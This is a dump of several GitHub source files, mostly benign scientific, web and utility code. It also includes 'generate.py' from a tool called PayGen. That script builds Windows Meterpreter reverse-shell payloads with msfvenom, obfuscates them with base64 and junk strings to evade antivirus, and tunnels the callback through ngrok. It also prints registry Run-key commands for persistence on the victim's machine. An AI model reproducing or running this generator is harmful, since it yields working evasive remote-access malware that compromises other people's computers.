new_geo_df.loc[ids, group_id_col] = ','.join(ids)\n\n return step_rep_geo(new_geo_df, self.weight_objective, self.deepness+1)\n\n def __repr__(self) -> str:\n return f\"(step_rep_geo) loss:{self.loss}\"\n \n def __gt__(self, other) -> bool:\n return self.loss > other.loss\n def __ge__(self, other) -> bool:\n return self.loss >= other.loss\n def __lt__(self, other) -> bool:\n return self.loss < other.loss\n def __le__(self, other) -> bool:\n return self.loss <= other.loss\n\n def __eq__(self, other: object) -> bool:\n if type(other) !=step_rep_geo: return False\n self_groups = self.get_groups_as_sets()\n other_groups: np.ndarray = other.get_groups_as_sets()\n return self_groups.isin(other_groups).all()\n \n def plot(self, title: str):\n # fused_nodes:GeoDataFrame = self.geo_df.loc[nodes_to_fuse].dissolve(aggfunc = sum).assign(code=','.join(nodes_to_fuse)).set_index('code')\n fig = px.choropleth(\n self.geo_df,\n geojson=self.geo_df['geometry'],\n locations=self.geo_df.index, \n color = group_error_col,\n color_continuous_scale = \"rdbu\",\n hover_data = [group_id_col, group_weight_col,self.geo_df.index, weight_col],\n title = title\n )\n\n fig.update_geos(fitbounds=\"locations\", visible=False)\n fig.update_layout(margin={\"r\":0,\"t\":0,\"l\":0,\"b\":0})\n fig.show()\n\n\nif __name__ == '__main__':\n step = step_rep_geo(geo_df=geo_df, weight_objective=weight_objective)\n # step.plot(\"initial\")\n group = step.group_ids_sorted_by_weight[0]\n group_connections = step.get_group_connections(group)\n next_step = step.fuse([group,group_connections[0]])\n next_step.plot(\"next\")\n# %%\n","repo_name":"leopoldlacroix/graph_proj","sub_path":"step_rep_geo.py","file_name":"step_rep_geo.py","file_ext":"py","file_size_in_byte":4400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"71085478322","text":"'''\nMy solution to Rosalind Algorithmic Heights Problem 005\n\nTitle: Double-Degree Array\nRosalind ID: DDEG\nRosalind #: 005\nURL: 
http://rosalind.info/problems/ddeg\n'''\n\nimport numpy as np\nimport os\n\ndef adjacency_list(k, edge_u, edge_v):\n out = {}\n for i in xrange(1, k+1):\n idx1 = np.where(edge_u == i)[0]\n idx2 = np.where(edge_v == i)[0]\n out[i] = np.concatenate((edge_u[idx2], edge_v[idx1]), axis=0)\n return out\n\n\nif __name__ == '__main__':\n # read data\n f = open(os.path.join(os.path.split(os.getcwd())[0], \"data\", \"rosalind_ddeg.txt\"), 'r')\n adj_list = [map(int, line.rstrip().split()) for line in f.readlines()]\n n = adj_list.pop(0)[0]\n\n # create numpy arrays\n l = len(adj_list)\n edge_u = np.empty(l, dtype=np.int)\n edge_v = np.empty(l, dtype=np.int)\n\n i = 0\n for line in adj_list:\n edge_u[i] = line[0]\n edge_v[i] = line[1]\n i += 1\n\n f.close()\n \n # convert to adjacency list\n o = adjacency_list(n, edge_u, edge_v)\n\n # sum degrees of neighbors\n counts = np.empty(n, dtype=np.int)\n for key in o:\n elems = o[key]\n count = 0\n for i in range(len(elems)):\n count += len(o[elems[i]])\n counts[key-1] = count\n\n # save output file\n outhandle = open(os.path.join(os.path.split(os.getcwd())[0], \"output\", \"Algorithmic_005.txt\"), 'w')\n print >> outhandle, ' '.join(map(str, counts))\n outhandle.close()\n\n\n\n\n\n\n\n\n\n\n","repo_name":"cdeterman/Rosalind","sub_path":"Algorithmic_005_DDEG/Algorithmic_005_DDEG.py","file_name":"Algorithmic_005_DDEG.py","file_ext":"py","file_size_in_byte":1465,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"75"} +{"seq_id":"74140166642","text":"from itertools import chain\nfrom typing import BinaryIO, List, Optional, Sequence, TextIO, Tuple, Union\nfrom pathlib import Path\n\nimport pandas as pd\n\ntry:\n from pyspark.sql import DataFrame as PySparkDataFrame\nexcept ImportError:\n pass\n\nfrom delta_sharing.protocol import DeltaSharingProfile, Schema, Share, Table\nfrom delta_sharing.reader import DeltaSharingReader\nfrom delta_sharing.rest_client import DataSharingRestClient\n\n\ndef _parse_url(url: str) -> Tuple[str, str, str, str]:\n \"\"\"\n :param url: a url under the format \"#..\"\n :return: a tuple with parsed (profile, share, schema, table)\n \"\"\"\n shape_index = url.rfind(\"#\")\n if shape_index < 0:\n raise ValueError(f\"Invalid 'url': {url}\")\n profile = url[0:shape_index]\n fragments = url[shape_index + 1 :].split(\".\")\n if len(fragments) != 3:\n raise ValueError(f\"Invalid 'url': {url}\")\n share, schema, table = fragments\n if len(profile) == 0 or len(share) == 0 or len(schema) == 0 or len(table) == 0:\n raise ValueError(f\"Invalid 'url': {url}\")\n return (profile, share, schema, table)\n\n\ndef load_as_pandas(url: str) -> pd.DataFrame:\n \"\"\"\n Load the shared table using the give url as a pandas DataFrame.\n\n :param url: a url under the format \"#..
\"\n :return: A pandas DataFrame representing the shared table.\n \"\"\"\n profile_json, share, schema, table = _parse_url(url)\n profile = DeltaSharingProfile.read_from_file(profile_json)\n return DeltaSharingReader(\n table=Table(name=table, share=share, schema=schema),\n rest_client=DataSharingRestClient(profile),\n ).to_pandas()\n\n\ndef load_as_spark(url: str) -> \"PySparkDataFrame\": # noqa: F821\n \"\"\"\n Load the shared table using the give url as a Spark DataFrame. `PySpark` must be installed, and\n the application must be a PySpark application with the Apache Spark Connector for Delta Sharing\n installed.\n\n :param url: a url under the format \"#..
\"\n :return: A Spark DataFrame representing the shared table.\n \"\"\"\n try:\n from pyspark.sql import SparkSession\n except ImportError:\n raise ImportError(\"Unable to import pyspark. `load_as_spark` requires PySpark.\")\n\n spark = SparkSession.getActiveSession()\n assert spark is not None, (\n \"No active SparkSession was found. \"\n \"`load_as_spark` requires running in a PySpark application.\"\n )\n return spark.read.format(\"deltaSharing\").load(url)\n\n\nclass SharingClient:\n \"\"\"\n A Delta Sharing client to query shares/schemas/tables from a Delta Sharing Server.\n \"\"\"\n\n def __init__(self, profile: Union[str, BinaryIO, TextIO, Path, DeltaSharingProfile]):\n if not isinstance(profile, DeltaSharingProfile):\n profile = DeltaSharingProfile.read_from_file(profile)\n self._profile = profile\n self._rest_client = DataSharingRestClient(profile)\n\n def list_shares(self) -> Sequence[Share]:\n \"\"\"\n List shares that can be accessed by you in a Delta Sharing Server.\n\n :return: the shares that can be accessed.\n \"\"\"\n shares: List[Share] = []\n page_token: Optional[str] = None\n while True:\n response = self._rest_client.list_shares(page_token=page_token)\n shares.extend(response.shares)\n page_token = response.next_page_token\n if page_token is None:\n return shares\n\n def list_schemas(self, share: Share) -> Sequence[Schema]:\n \"\"\"\n List schemas in a share that can be accessed by you in a Delta Sharing Server.\n\n :param share: the share to list.\n :return: the schemas in a share.\n \"\"\"\n schemas: List[Schema] = []\n page_token: Optional[str] = None\n while True:\n response = self._rest_client.list_schemas(share=share, page_token=page_token)\n schemas.extend(response.schemas)\n page_token = response.next_page_token\n if page_token is None:\n return schemas\n\n def list_tables(self, schema: Schema) -> Sequence[Table]:\n \"\"\"\n List tables in a schema that can be accessed by you in a Delta Sharing Server.\n\n :param schema: the schema to list.\n :return: the tables in a schema.\n \"\"\"\n tables: List[Table] = []\n page_token: Optional[str] = None\n while True:\n response = self._rest_client.list_tables(schema=schema, page_token=page_token)\n tables.extend(response.tables)\n page_token = response.next_page_token\n if page_token is None:\n return tables\n\n def list_all_tables(self) -> Sequence[Table]:\n \"\"\"\n List all tables that can be accessed by you in a Delta Sharing Server.\n\n :return: all tables that can be accessed.\n \"\"\"\n shares = self.list_shares()\n schemas = chain(*(self.list_schemas(share) for share in shares))\n return list(chain(*(self.list_tables(schema) for schema in schemas)))\n","repo_name":"aalbu/aalbu-delta-sharing","sub_path":"python/delta_sharing/delta_sharing.py","file_name":"delta_sharing.py","file_ext":"py","file_size_in_byte":5093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"12481209205","text":"import numpy as np\nimport sys\n\nfrom fealpy.pde.poisson_model_2d import CrackData, LShapeRSinData, CosCosData, KelloggData, SinSinData, ffData\nfrom fealpy.vem import PoissonVEMModel \nfrom fealpy.mesh.adaptive_tools import AdaptiveMarker \nfrom fealpy.tools.show import showmultirate\nfrom fealpy.quadrature import TriangleQuadrature \n\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\nm = int(sys.argv[1])\nmaxit = int(sys.argv[2])\np = int(sys.argv[3])\n\nif m == 1:\n pde = KelloggData()\n quadtree = pde.init_mesh(n=4)\nelif m == 2:\n pde = 
LShapeRSinData() \n quadtree = pde.init_mesh(n=4)\nelif m == 3:\n pde = CrackData()\n quadtree = pde.init_mesh(n=4)\nelif m == 4:\n pde = CosCosData()\n quadtree = pde.init_mesh(n=2)\nelif m == 5:\n pde = SinSinData()\n quadtree = pde.init_mesh(n=3)\nelif m == 6:\n pde = ffData()\n quadtree = pde.init_mesh(n=2)\n\n\n\n\ntheta = 0.2\n\nk = maxit - 15 \nerrorType = ['$\\| u_I - u_h \\|_{l_2}$',\n '$\\|\\\\nabla u_I - \\\\nabla u_h\\|_A$',\n '$\\| u - \\Pi^\\Delta u_h\\|_0$',\n '$\\|\\\\nabla u - \\\\nabla \\Pi^\\Delta u_h\\|$',\n '$\\|\\\\nabla \\Pi^\\Delta u_h - \\Pi^\\Delta G(\\\\nabla \\Pi^\\Delta u_h) \\|$'\n ]\nNdof = np.zeros((maxit,), dtype=np.int)\nerrorMatrix = np.zeros((len(errorType), maxit), dtype=np.float)\nmesh = quadtree.to_pmesh()\n\nintegrator = TriangleQuadrature(6)\nfor i in range(maxit):\n print('step:', i)\n vem = PoissonVEMModel(pde, mesh, p=p, integrator=integrator)\n vem.solve()\n eta = vem.recover_estimate(residual=True)\n Ndof[i] = vem.vemspace.number_of_global_dofs()\n errorMatrix[0, i] = vem.l2_error()\n errorMatrix[1, i] = vem.uIuh_error() \n errorMatrix[2, i] = vem.L2_error()\n errorMatrix[3, i] = vem.H1_semi_error()\n errorMatrix[0, i] = np.sqrt(np.sum(eta**2))\n if i < maxit - 1:\n quadtree.refine(marker=AdaptiveMarker(eta, theta=theta))\n mesh = quadtree.to_pmesh()\n\nmesh.add_plot(plt, cellcolor='w')\n\nfig2 = plt.figure()\nfig2.set_facecolor('white')\naxes = fig2.gca(projection='3d')\nx = mesh.node[:, 0]\ny = mesh.node[:, 1]\ntri = quadtree.leaf_cell(celltype='tri')\naxes.plot_trisurf(x, y, tri, vem.uh[:len(x)], cmap=plt.cm.jet, lw=0.0)\n\nshowmultirate(plt, k, Ndof, errorMatrix, errorType)\nplt.show()\n\n","repo_name":"wubangminlll/fealpy.why","sub_path":"example/PoissonAdaptiveVEM.py","file_name":"PoissonAdaptiveVEM.py","file_ext":"py","file_size_in_byte":2273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"37549617723","text":"from pprint import pprint\n\ndef diffusion(arr, x, y):\n stack = [x, y]\n while stack:\n y = stack.pop()\n x = stack.pop()\n for dx, dy in idx:\n while 0 <= x+dx < N and 0 <= y+dy < M and arr[x+dx][y+dy] == 0:\n arr[x+dx][y+dy] = 2\n stack.extend([x+dx, y+dy])\n\n\ndef findzero(arr):\n zero = []\n for i in range(N):\n for j in range(M):\n if arr[i][j] == 0:\n zero += [[i, j]]\n return zero\n\n\ndef findvirus(arr):\n virus = []\n for i in range(N):\n for j in range(M):\n if arr[i][j] == 2:\n virus += [[i, j]]\n return virus\n\n\ndef combination(arr=[], idx=-1):\n if len(arr) == 3:\n res.append(arr)\n return 0\n for i in range(idx+1, len(zero)):\n combination(arr+[zero[i]], i)\n\n\nN, M = map(int, input().split())\nboard = [list(map(int, input().split())) for _ in range(N)]\nidx = [[-1, 0], [1, 0], [0, -1], [0, 1]]\nzero = findzero(board)\nvirus = findvirus(board)\nres = []\ncombination()\nsafety = 0\nfor x, y, z in res:\n newboard = [j[:] for j in board]\n newboard[x[0]][x[1]] = 1\n newboard[y[0]][y[1]] = 1\n newboard[z[0]][z[1]] = 1\n for i, j in virus:\n diffusion(newboard, i, j)\n s = 0\n for i in newboard:\n s += i.count(0)\n if s > safety:\n safety = s\nprint(safety)\n","repo_name":"seoul-ssafy-class-2-studyclub/hyeonhwa","sub_path":"baekjoon/14502.py","file_name":"14502.py","file_ext":"py","file_size_in_byte":1355,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"31251787183","text":"import matplotlib.pyplot as plt\nimport sys\nimport pandas as pd\n\nfig = plt.gcf()\nfig.set_size_inches(4.5,4)\n\ndf = 
pd.read_csv('pips_baseline.csv')\ndf1 = pd.read_csv('pips_scouts.csv')\ndf1['n'] = df1['id'].map(lambda x: int(x[-3:]))\ndf['n'] = df['id'].map(lambda x: int(x[-3:]))\nper_scouts = {'1':[],'2':[], '3': [], '4':[],'5': [], '8':[]}\nfor r in df1.iterrows():\n row = r[1]\n baseline = df[df['n']==row['n']].to_numpy()[0][2]\n print(per_scouts[str(row['scouts'])])\n per_scouts[str(row['scouts'])] = per_scouts[str(row['scouts'])]+[row['cumulative_ipc']/baseline]\n\nper_scouts['4']=4*[pd.read_csv('pips_sm.csv')['ratio'].mean()] #for the baseline\nprint(per_scouts)\nx = []\ny = []\nfor k,v in per_scouts.items():\n x.append(k)\n y.append(sum(v)/4)\nprint(x)\nprint(y)\nax = plt.gca()\nintervals = [1.18,1.2,1.22,1.24,1.26,1.28]\nplt.grid(axis='y',zorder=0)\nax.set_yticks(intervals)\nplt.ylim(1.18,1.28)\nplt.bar(x,y,zorder=3)\nplt.ylabel(\"Speedup\",fontsize=12)\nplt.xlabel(\"N Scouts\",fontsize=12)\nplt.tight_layout()\nplt.savefig('pips_scouts.eps',format='eps')\nplt.show()\n\n\n# fig = plt.gcf()\n# fig.set_size_inches(4.5,4)\n\n# df = pd.read_csv('pips_baseline.csv')\n# df1 = pd.read_csv('pips_tag2.csv')\n# df1['n'] = df1['id'].map(lambda x: int(x[-3:]))\n# df['n'] = df['id'].map(lambda x: int(x[-3:]))\n# per_tag = {'2': [], '4': [], '8':[],'12':[],'16':[],'24':[]}\n\n# per_tag['16']=4*[pd.read_csv('tap_sm.csv')['ratio'].mean()] #for the baseline\n# for r in df1.iterrows():\n# row = r[1]\n# if str(row['tag'])=='13' or str(row['tag'])=='15':\n# continue \n# baseline = df[df['n']==row['n']].to_numpy()[0][2]\n# per_tag[str(row['tag'])] = per_tag[str(row['tag'])]+[row['cumulative_ipc']/baseline]\n\n# x = []\n# y = []\n# for k,v in per_tag.items():\n# x.append(k)\n# y.append(sum(v)/4)\n\n# ax = plt.gca()\n# intervals = [0.95,1,1.05,1.1,1.15,1.2,1.25,1.3,1.35,1.4]\n# plt.grid(axis='y',zorder=0)\n# ax.set_yticks(intervals)\n# plt.ylim(0.9,1.35)\n# plt.bar(x,y,zorder=3,color='darkblue')\n# plt.ylabel(\"Speedup\",fontsize=12)\n# plt.xlabel(\"Tag Size\",fontsize=12)\n# plt.tight_layout()\n# plt.savefig('pips_tags.eps',format='eps')\n# plt.show()\n","repo_name":"jfswitzer/240C_22","sub_path":"jens_scripts/pips_dse.py","file_name":"pips_dse.py","file_ext":"py","file_size_in_byte":2153,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"73274619763","text":"from django.shortcuts import render\nfrom django.shortcuts import render, get_object_or_404, redirect\nfrom django.utils import timezone\nfrom ku_manam.models import Article, Comment\nfrom .forms import ArticleForm, CommentForm\nfrom django.core.paginator import Paginator\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib import messages\nfrom django.db.models import Q\nfrom django.http import HttpResponseNotAllowed\n\ndef allarticles(request):\n page = request.GET.get('page', '1') # 페이지\n kw = request.GET.get('kw', '') # 검색어\n article_list = Article.objects.order_by('-create_date')\n if kw:\n article_list = article_list.filter(\n Q(subject__icontains=kw) | # 제목 검색\n Q(content__icontains=kw) # 내용 검색\n ).distinct()\n paginator = Paginator(article_list, 10) # 페이지당 10개씩 보여주기\n page_obj = paginator.get_page(page)\n context = {'article_list': page_obj, 'page': page, 'kw': kw}\n return render(request, 'community/allarticles.html', context)\n\n##자율동아리 모집\ndef recruitment(request):\n page = request.GET.get('page', '1') # 페이지\n kw = \"모집\"\n article_list = Article.objects.order_by('-create_date')\n if kw:\n article_list = article_list.filter(\n Q(category=\"모집\")\n ).distinct()\n 
paginator = Paginator(article_list, 10) # 페이지당 10개씩 보여주기\n page_obj = paginator.get_page(page)\n context = {'article_list': page_obj}\n return render(request, 'community/recruitment.html', context)\n\n##프로그램 신청\ndef proposal(request):\n page = request.GET.get('page', '1') # 페이지\n kw = \"신청\"\n article_list = Article.objects.order_by('-create_date')\n if kw:\n article_list = article_list.filter(\n Q(category=\"신청\")\n ).distinct()\n paginator = Paginator(article_list, 10) # 페이지당 10개씩 보여주기\n page_obj = paginator.get_page(page)\n context = {'article_list': page_obj}\n return render(request, 'community/proposal.html', context)\n\ndef detail(request, article_id):\n article = get_object_or_404(Article, pk=article_id)\n context = {'article': article}\n return render(request, 'community/question_detail.html', context)\n\n@login_required(login_url='common:login')\ndef question_create(request):\n if request.method == 'POST':\n form = ArticleForm(request.POST)\n if form.is_valid():\n article = form.save(commit=False)\n article.author = request.user\n article.create_date = timezone.now()\n article.save()\n return redirect('community:allarticles')\n else:\n form = ArticleForm()\n context = {'form': form}\n return render(request, 'community/question_form.html', context)\n\n@login_required(login_url='common:login')\ndef answer_create(request, article_id):\n article = get_object_or_404(Article, pk=article_id)\n if request.method == \"POST\":\n form = CommentForm(request.POST)\n if form.is_valid():\n comment = form.save(commit=False)\n comment.author = request.user\n comment.create_date = timezone.now()\n comment.article = article\n comment.save()\n return redirect('community:detail', article_id=article.id)\n else:\n return HttpResponseNotAllowed('Only POST is possible.')\n context = {'article': article, 'form': form}\n return render(request, 'community/question_detail.html', context)\n\n@login_required(login_url='common:login')\ndef question_modify(request, article_id):\n article = get_object_or_404(Article, pk=article_id)\n if request.user != article.author:\n messages.error(request, '수정 권한이 없습니다')\n return redirect('community:detail', article_id=article.id)\n if request.method == \"POST\":\n form = ArticleForm(request.POST, instance=article)\n if form.is_valid():\n article = form.save(commit=False)\n article.modify_date = timezone.now() # 수정일시 저장\n article.save()\n return redirect('community:detail', article_id=article.id)\n else:\n form = ArticleForm(instance=article)\n context = {'form': form}\n return render(request, 'community/question_form.html', context)\n\n@login_required(login_url='common:login')\ndef question_delete(request, article_id):\n article = get_object_or_404(Article, pk=article_id)\n if request.user != article.author:\n messages.error(request, '삭제 권한이 없습니다')\n return redirect('community:detail', article_id=article.id)\n article.delete()\n return redirect('community:allarticles')\n\n@login_required(login_url='common:login')\ndef answer_modify(request, comment_id):\n comment = get_object_or_404(Comment, pk=comment_id)\n if request.user != comment.author:\n messages.error(request, '수정 권한이 없습니다')\n return redirect('community:detail', article_id=comment.article.id)\n if request.method == \"POST\":\n form = CommentForm(request.POST, instance=comment)\n if form.is_valid():\n comment = form.save(commit=False)\n comment.modify_date = timezone.now()\n comment.save()\n return redirect('community:detail', article_id=comment.article.id)\n else:\n form = CommentForm(instance=comment)\n context = 
{'comment': comment, 'form': form}\n return render(request, 'community/answer_form.html', context)\n\n@login_required(login_url='common:login')\ndef answer_delete(request, comment_id):\n comment = get_object_or_404(Comment, pk=comment_id)\n if request.user != comment.author:\n messages.error(request, '삭제 권한이 없습니다')\n else:\n comment.delete()\n return redirect('community:detail', article_id=comment.article.id)\n\n@login_required(login_url='common:login')\ndef like(request, article_id):\n article = get_object_or_404(Article, pk=article_id)\n if request.user in article.like_users.all():\n article.like_users.remove(article.author)\n else:\n article.like_users.add(request.user)\n return redirect('community:detail', article.id)","repo_name":"hwangmina/manam","sub_path":"community/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6202,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"13059357534","text":"import os\nimport string\nimport random\nimport time\nimport requests\nimport base64\n\n\n\n\nclass Encrypt:\n def __init__(self):\n self.YELLOW, self.GREEN = '\\33[93m', '\\033[1;32m'\n self.text = \"\"\n self.enc_txt = \"\"\n\n def encrypt(self, filename):\n print(f\"\\n{self.YELLOW}[*] Encrypting Source Codes...\")\n with open(filename, \"r\") as f:\n lines_list = f.readlines()\n for lines in lines_list:\n self.text += lines\n\n self.text = self.text.encode()\n self.enc_txt = base64.b64encode(self.text)\n\n with open(filename, \"w\") as f:\n f.write(f\"import base64; exec(base64.b64decode({self.enc_txt}))\")\n time.sleep(2)\n print(f\"{self.GREEN}[+] Code Encrypted\\n\")\n\nLen = 8\nrandomtask = ''.join(random.choices(string.ascii_uppercase + string.digits, k=Len))\n\n\ndef Banner():\n os.system(\"clear\")\n print(Green+\"\"\" \n ____ __ _ _ ___ ____ _ _ \n( _ \\ /__\\ ( \\/ )/ __)( ___)( \\( )\n )___//(__)\\ \\ /( (_-. 
)__) ) ( \n(__) (__)(__)(__) \\___/(____)(_)\\_)\nCoded By youhacker55\n\nDon t upload Payload To VirusTotal \n \"\"\")\n\nz = random.randint(40,50)\n\nS = z\n\nran = ''.join(random.choices(string.ascii_uppercase + string.digits, k=S))\n\n\nRed =\"\\u001b[31m\"\nGreen =\"\\u001b[32m\"\ndef listeners():\n listen = input(Green+\"do you want to start multi/handler:\")\n if listen == \"yes\":\n with open(\"handlers/\"+payloadname+\".rc\",\"w\") as hand:\n hand.write(\"use multi/handler\\n\")\n hand.write(\"set payload windows/meterpreter/reverse_\"+prot+\"\\n\")\n hand.write(\"set lhost \"+lhost+\"\\n\")\n hand.write(\"set lport \"+lport+\"\\n\")\n hand.write(\"exploit\")\n hand.close()\n os.system(\"sudo msfconsole -r handlers/\"+payloadname+\".rc\")\ndef ngrokhandler(nglport,prot):\n with open(\"handlers/ngrok.rc\", \"w\") as hand:\n hand.write(\"use multi/handler\\n\")\n hand.write(\"set payload windows/meterpreter/reverse_\" + prot + \"\\n\")\n hand.write(\"set lhost 0.0.0.0 \\n\")\n hand.write(\"set lport \" + nglport + \"\\n\")\n hand.write(\"exploit\")\n hand.close()\n\n\n\ndef inplace_change(filename, old_string, new_string):\n with open(filename) as f:\n s = f.read()\n if old_string not in s:\n return\n\n with open(filename, 'w') as f:\n s = s.replace(old_string, new_string)\n f.write(s)\n\nBanner()\nprint(Red+\"\"\"\n1)Generate Payload\n2)AutoPortForwarding(Ngrok)\n3)Help Me With Persistence\n\"\"\")\nchoose = int(input(\"root@Gen:\"))\n\nif choose == 1:\n lhost = input(Green+\"entre Lhost:\")\n lport = input(Green+\"entre Lport:\")\n prot=input(Green+\"Payload_Type(tcp,https):\")\n payloadname = input(Green + \"entre PayloadName:\")\n os.system(\"msfvenom -p windows/meterpreter/reverse_\" + prot + \" LHOST=\" + lhost + \" LPORT=\" + lport + \" SessionExpirationTimeout=0 SessionCommunicationTimeout=0 exitfunc=process -f psh-cmd -o payload.bat >/dev/null 2>&1\")\n print(Green + \"[*]Generating Payload\")\n inplace_change(\"payload.bat\", \"%COMSPEC%\", \"cmd.exe\")\n with open(\"payload.bat\") as reverseshell:\n thepay = reverseshell.read()\n os.system(\"cp -r template/payload.py payloads/\")\n os.system(\"cd payloads/ && mv payload.py \" + payloadname + \".py\")\n inplace_change(\"payloads/\" + payloadname + \".py\", \"changeme\", thepay)\n inplace_change(\"payloads/\" + payloadname + \".py\", \"RANDROMSTRING\", ran)\n\n print(\"Adding Some Junk Code To Evade AV :)\")\n time.sleep(1)\n os.remove(\"payload.bat\")\n enc = Encrypt()\n enc.encrypt(\"payloads/\" + payloadname + \".py\")\n print(\"Payload Saved in payloads/\")\n time.sleep(5)\n listeners()\nelif choose == 2:\n\n try:\n prot = input(Green + \"Payload_Type(tcp,https):\")\n payloadname = input(Green + \"entre PayloadName:\")\n port = input(\"entre ngrok localport:\")\n ngrokhandler(port,prot)\n os.system(\"xterm -fg green -bg black -e ngrok tcp \" + port + \" & \")\n time.sleep(5)\n\n url = \"http://127.0.0.1:4040/api/tunnels\"\n recived = requests.get(url)\n tcp = recived.json()[\"tunnels\"][0][\"public_url\"]\n ngrokhost = (tcp[6:20])\n ngrokport = (tcp[21:])\n os.system(\"msfvenom -p windows/meterpreter/reverse_\" + prot + \" LHOST=\" + ngrokhost + \" LPORT=\" + ngrokport + \" SessionExpirationTimeout=0 SessionCommunicationTimeout=0 exitfunc=process -f psh-cmd -o payload.bat >/dev/null 2>&1\")\n print(Green + \"[*]Generating Payload\")\n inplace_change(\"payload.bat\", \"%COMSPEC%\", \"cmd.exe\")\n with open(\"payload.bat\") as reverseshell:\n thepay = reverseshell.read()\n os.system(\"cp -r template/payload.py 
payloads/\")\n os.system(\"cd payloads/ && mv payload.py \" + payloadname + \".py\")\n inplace_change(\"payloads/\" + payloadname + \".py\", \"changeme\", thepay)\n inplace_change(\"payloads/\" + payloadname + \".py\", \"RANDROMSTRING\", ran)\n print(\"Adding Some Junk Code To Evade AV :)\")\n os.remove(\"payload.bat\")\n enc = Encrypt()\n enc.encrypt(\"payloads/\" + payloadname + \".py\")\n print(\"Payload Saved in payloads/\")\n time.sleep(5)\n multhandler = input(\"do you want to start multi/handler:\")\n if multhandler == \"yes\":\n os.system(\"sudo msfconsole -r handlers/ngrok.rc\")\n else:\n exit()\n\n\n\n except requests.ConnectionError:\n print(\"Check Ngrok Authtoken\")\n exit()\n\n\n\n\n\nelif choose == 3:\n admin = input(\"Do you Have Admin Priv:\")\n if admin == \"yes\":\n task = input(\"entre the taskName (Entre For Random 1):\")\n if task == \"\":\n path = input(\"Entre Payload Path on The Target Sys:\")\n command = 'reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"' + randomtask + '\" /t REG_SZ /F /D \"' + path + '\"'\n print(Green+\" Type this on Target Shell ==> \",Red+command+'\\n')\n else:\n path = input(\"Entre Payload Path on The Target Sys:\")\n command = 'reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"' + task + '\" /t REG_SZ /F /D \"' + path + '\"'\n print(Green+\" Type this on Target Shell ==> \",Red+ command)\n else:\n task = input(\"entre the taskName (Entre For Random 1):\")\n if task == \"\":\n path = input(\"Entre Payload Path on The Target Sys:\")\n command = 'reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"'+randomtask +'\" /t REG_SZ /F /D \"'+path+'\"'\n print(Green + \" Type this on Target Shell ==> \", Red + command + '\\n')\n else:\n path = input(\"Entre Payload Path on The Target Sys:\")\n command = 'reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"' +task+ '\" /t REG_SZ /F /D \"' + path + '\"'\n print(Green + \" Type this on Target Shell ==> \", Red + command + '\\n')\n\n\n\n\n\n\n\n\n","repo_name":"TrendingTechnology/PayGen","sub_path":"generate.py","file_name":"generate.py","file_ext":"py","file_size_in_byte":6926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"75"} +{"seq_id":"32708026596","text":"import argparse\nimport ast\nimport os\nimport re\nfrom textwrap import dedent\n\nfrom pycparser import parse_file, preprocess_file, CParser\nfrom pycparser.c_generator import CGenerator\n\nfrom interpreter_generator.py_generator import (\n CAstGeneralizerBackend,\n FixupMatchsVisitor,\n FixupConstantsVisitor,\n FixupCallAssignVisitor,\n FixupNullVisitor,\n)\nfrom interpreter_generator.generate_cases import main\n\nDEFAULT_INPUT = os.path.relpath(\n os.path.join(os.path.dirname(__file__), \"generated_cases.c\")\n)\nDEFAULT_OUTPUT = os.path.relpath(\n os.path.join(os.path.dirname(__file__), \"../interpreter/interpreter.py\")\n)\n\n\ndef translate_to_py(filename, output_filename):\n \"\"\"Simply use the c_generator module to emit a parsed AST.\"\"\"\n c_preproc_args = [\n \"-E\", # only run the preprocessor\n \"-Wno-everything\",\n ]\n print(f\"clang {' '.join(c_preproc_args + [filename])}\")\n text = preprocess_file(filename, \"clang\", c_preproc_args)\n text = (\n text.replace(\"((_PyCFunctionFast)(void(*)(void))cfunc)\", \"cfunc\")\n .replace(\"(_PyCFunctionFastWithKeywords)(void(*)(void))\", \"\")\n .replace(\"(_PyCFunctionFast)(void(*)(void))meth\", \"meth\")\n 
.replace(\"PyObject *(*conv_fn)(PyObject *);\", \"\")\n )\n # text = text.replace(\"__uint16_t\", \"int\").replace(\"unsigned short int\", \"short\")\n with open(\"out.c\", \"w\") as f:\n f.write(text)\n\n parser = CParser()\n tree = parser.parse(text, filename)\n generator = CAstGeneralizerBackend()\n with open(output_filename, \"w\") as o:\n o.write(\n dedent(\n \"\"\"\\\n from typing import Any, List, Callable\n # from pytype.pyc import opcodes as ops\n \n BINARY_OP: Any \n BINARY_SUBSCR: Any \n CALL: Any \n CALL_PY_EXACT_ARGS: Any \n COMPARE_OP: Any \n CO_ASYNC_GENERATOR: Any \n CO_COROUTINE: Any \n CO_ITERABLE_COROUTINE: Any \n CO_OPTIMIZED: Any \n DICT_KEYS_UNICODE: Any \n END_FOR: Any \n FOR_ITER: Any \n FRAME_CREATED: Any \n FRAME_EXECUTING: Any \n FRAME_OWNED_BY_GENERATOR: Any \n FRAME_SUSPENDED: Any \n FVC_ASCII: Any \n FVC_MASK: Any \n FVC_NONE: Any \n FVC_REPR: Any \n FVC_STR: Any \n FVS_HAVE_SPEC: Any \n FVS_MASK: Any \n INLINE_CACHE_ENTRIES_BINARY_OP: Any \n INLINE_CACHE_ENTRIES_BINARY_SUBSCR: Any \n INLINE_CACHE_ENTRIES_CALL: Any \n INLINE_CACHE_ENTRIES_FOR_ITER: Any \n INLINE_CACHE_ENTRIES_LOAD_ATTR: Any \n 